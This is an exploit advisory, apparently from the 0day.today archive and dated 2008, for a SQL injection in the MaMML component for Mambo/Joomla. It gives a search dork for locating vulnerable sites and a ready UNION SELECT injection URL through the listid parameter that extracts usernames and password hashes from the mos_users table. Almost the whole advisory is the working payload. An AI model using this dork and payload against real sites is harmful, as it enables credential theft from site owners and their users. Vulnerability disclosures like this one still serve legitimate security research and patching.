id: 2564
date: 01/29/2008
title: Mambo Component MaMML (listid) Remote SQL Injection Vulnerability
author: S@BUN
cves: 

=================================================================
Mambo Component MaMML (listid) Remote SQL Injection Vulnerability
=================================================================



#########################################################################
#
# joomla SQL Injection(com_mamml)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_mamml"
#
########################################################################
EXPLOIT :

index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*




#  0day.today [2023-03-23]  #